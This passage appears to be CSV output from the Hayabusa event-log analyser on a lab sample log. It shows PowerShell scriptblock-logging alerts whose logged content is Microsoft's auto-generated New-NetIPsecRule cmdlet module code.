${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 